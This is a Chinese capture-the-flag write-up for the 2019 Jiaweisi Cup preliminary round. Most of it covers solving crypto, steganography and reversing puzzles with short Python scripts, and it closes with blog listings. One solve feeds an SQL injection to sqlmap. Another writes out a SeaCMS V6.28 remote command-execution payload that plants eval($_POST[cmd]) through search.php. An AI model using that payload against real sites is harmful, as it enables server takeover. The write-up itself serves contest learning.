2019嘉韦思杯线上初赛writeup
1 土肥原贤二
看到页面怀疑是sql注入,写了个4'进去就发生报错。
could not to the database You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''4''' at line 1
直接丢到sqlmap里
id,flag
20_welcome_19,20_welcome_19
1,1
从而得到flag
2 吴佩孚
先是有点蒙,试了下base64,发现得到(![]+[])[+[]]+(![]+[])[!+[],看起来是jsfuck,丢到浏览器console中得到flag
3 死亡真相
wav音屏文件,用audacity打开,先是频谱图,发现有先是flag:。。。。,后面的字符串是32位,但是其中有三个下划线,猜测是挖掉了三个数字的md5,于是取中间16位,形成16位的md5,这样子就只含有两个下划线,16*16=256中可能。在网上在线批量解密,发现两个下划线都替换成0的时候就可以解开,用flag{}包装下提交
4 日军空袭
不停地base64解码,最后得到flag{fB__l621a4h4g_ai%7B%26i%7D},url解码得fB__l621a4h4g_ai{&i},然后解移位密码,位移为4,得flag
6 戴星炳
用python,获得网页,正则提取然后eval算出来,再请求,获得falg
import requests
import re
r = requests.get('http://47.103.43.235:82/web/a/index.php')
a = re.findall(r'<p>(0x.*)</p>',r.text)[0]
a = eval(a)
print(a)
rr = requests.post('http://47.103.43.235:82/web/a/index.php',data={'result':str(a)})
print(rr.text)
7 大美晚报
二维码,下载下来,显示用binwalk发现里面有压缩包,用foremost得到里面的压缩包,记事本打开发现有句话说密码是qq号,所以用zipperello穷举数字8-10位组合,得到密码674290437,解压zip得到falg
8 潘汉年
bg[`sZ*Zg'dPfP`VM_SXVd
观察前面五个字符和flag{这五个字符ascii码的差,发现这个差是递增的,根据这个规律就可以解密啦
s = "bg[`sZ*Zg'dPfP`VM_SXVd"
r = ''
for i in range(len(s)):
r = r+chr(ord(s[i])+4+i)
print(r)
9 袁殊
rsa加密,根据public key ,用openssl获得n和e,由于n不大,在http://factordb.com/分解得到pq,然后就可以直接解密啦
n16 = 'A9BD4C7A7763370A042FE6BEC7DDC841602DB942C7A362D1B5D372A4D08912D9'
p = 273821108020968288372911424519201044333
q = 280385007186315115828483000867559983517
#273821108020968288372911424519201044333<39> · 280385007186315115828483000867559983517<39>
n = int(n16,16)
e = 65537
import gmpy2
import rsa
d = int(gmpy2.invert(e , (p-1) * (q-1)))
privatekey = rsa.PrivateKey(n , e , d , p , q) #根据已知参数,计算私钥
with open("fllllllag.txt" , "rb") as f:
print(rsa.decrypt(f.read(), privatekey).decode()) #使用私钥对密文进行解密,并打印
11 晴气庆胤
根据html中的提示,是要输入两个不同的字符串但是有相同md5
使用fastcoll生成两个具有相同md5的文件,再利用python post过去就可以获得falg了
import requests
url = 'http://47.103.43.235:85/a/'
with open('msg1.bin','rb') as f:
data1 = f.read()
with open('msg2.bin','rb') as f:
data2 = f.read()
d = {'param1':data1,'param2':data2}
r = requests.post(url,data = d)
print(r.text)
12 梅津美治郎
逆向
有两个密码,windbg动态调试即可,给scanf下断点
第一层的密码在调用strcmp的地方直接就可以找到
第二层的密码是显示内存中有一个字符串,将这个字符串的每个字符和2进行异或得到的就是第二层密码
14 作战计划
seacms,利用海洋CMS V6.28 命令执行 0DAY,直接菜刀/search.php?searchtype=5&tid=&area=eval($_POST[cmd])就可以看到有个flag文件,打开就是flag
2019嘉韦思杯线上初赛writeup的更多相关文章
- 2019“嘉韦思杯”3.30初赛一部分Write Up
同学们TQL.佩服李长兴同学的超神瓜皮思维. 一.飞虎队(希尔密码) 本题是我今天大部分时间的花费处.先百度学习了希尔密码,然后尝试手动计算逆矩阵和矩阵乘法,还求助于线性代数课本,可谓苦不堪言. 做题 ...
- 2019“嘉韦思”杯RSA256题目wp
首先我们从网站下载了一个压缩包,解压出来一看里面有2个文件 首先我们先打开fllllllag康康,结果发现是一串乱码,这时候第一反应就是,文件被加密了,再看fllllllag下面的gy.key文件,更 ...
- 上海嘉韦思杯部分writeup
第二题 打开赛题,看到加密字符串,进行base64解密,发现是JSFUCK,再次解密,控制台得到flag. 第三题 打开频谱图得到flag,flag中有三个_,联想到音频文件详细信息中的三个zero, ...
- 2019第十二届全国大学生信息安全实践创新赛线上赛Writeup
本文章来自https://www.cnblogs.com/iAmSoScArEd/p/10780242.html 未经允许不得转载! 1.MISC-签到 下载附件后,看到readme.txt打开后提 ...
- 安恒杯 3月线上个人赛WriteUp
#前言 这次做的还挺多的,只有个Web300没做出来,排名由上次60+进步到这次16名(最后三分钟掉了5名),感觉还是不错的.但是很明显,流量题有很大的运气成分.做完流量题之后还剩一个多小时,水了水M ...
- 西湖论剑2019复现-Web之首家线上赌场上线啦
首页打开 经过测试发现name和code参数可控,但尝试注入没有发现注入点,于是直接扫描目录找思路 一扫描,果然有问题 目录扫描里面可以看到有一个/.DS_Store的文件,DS_Store是Mac ...
- 2016/12/3-问鼎杯线上赛1-1-Misc
拿到这道题目的文件,是一个压缩包,解压之后,我们看到一个1.txt文件,打开之后全是一堆数字,然后看到255,0,144等内容,估计是图片的像素值. 既然知道是像素值了,在CTF中,一般是8位比特的R ...
- 庞果英雄会第二届在线编程大赛·线上初赛:AB数
题目链接 给定两个正整数a,b,分别定义两个集合L和R, 集合L:即把1~a,1~b中整数乘积的集合定义为L = {x * y | x,y是整数且1 <= x <=a , 1 <= ...
- ISCC 2018线上赛 writeup
今天有机会去ISCC2018参加了比赛,个人的感受是比赛题目整体难度不高,就是脑洞特别大,flag形式不明确,拿到flag后也要猜测flag格式,贼坑 废话不多说,以下是本人的解题思路 MISC 0x ...
随机推荐
- 电脑小白和ta的小白电脑——Tomcat服务器
配置web服务器tomcat,这里默认了已经配置JAVA开发环境↓ https://www.cnblogs.com/gifted35/p/9775112.html (一)下载tomcat 我安装的服务 ...
- js 统计字符串中字符出现的次数
var str='abbcccdddd';var obj={};for(var i=0;i<str.length;i++){ var key=str.charAt(i); if(obj[key] ...
- python os.walk()遍历文件夹
转自 http://alanland.iteye.com/blog/612459 via @alanland 今天第一次进行 文件遍历,自己递归写的时候还调试了好久,(主要因为分隔符号的问题),后来发 ...
- 2、CentOS下编译安装Python2.7.6(转)
CentOS系统下面Python在升级到2.7.6的时候,没有找到安装包直接安装,只能通过源代码编译的方式来安装Python 2.7.6版本.这篇是编译和安装Python2.7.6的过程记录. Cen ...
- dubbo-admin 配置运行
1.下载dubbo源码:http://dubbo.io/ 2.idea 导入maven项目 3.配置tomcat:http://localhost:8080/ 4.下载zookeeper:http:/ ...
- IIS--------问题解决(localhost可以访问,本地ip不可以)
api:localhost可以访问,本地ip就不可以,报错:405 解决方案:api项目 - 属性 - web - 服务器 将:iis-express 改为 本地iis 创建虚拟目录:eg:http: ...
- 《JavaScript Dom 编程艺术》读书笔记-第10章
用JS实现动画~内容包括: 1. 动画基础知识 2. 用动画丰富网页的浏览效果 动画就是让元素的位置随时间而不断变化. 位置: //CSSelement{ position:absolute; top ...
- Problem A: 重载字符的加减法
Description 定义一个字符类Character,只有一个char类型的数据成员. 重载它的+.-.<<和>>运算符,其中+.-的第二个操作数是int类型的整数n.“+ ...
- c# word interop encrypt with password protect with password
public static void EncryptWithPassword(string unEncryptedWordPath, string password) { Word.Applicati ...
- Excel修改证件照图片背景色
在实际生活中,我们常常需要把白底证件照更改为蓝底或红底.操作步骤只需4步! 工具/原料 Excel 方法/步骤 第1步:插入白底证件照 单击[插入]---[图片],选择图片保存的位置, ...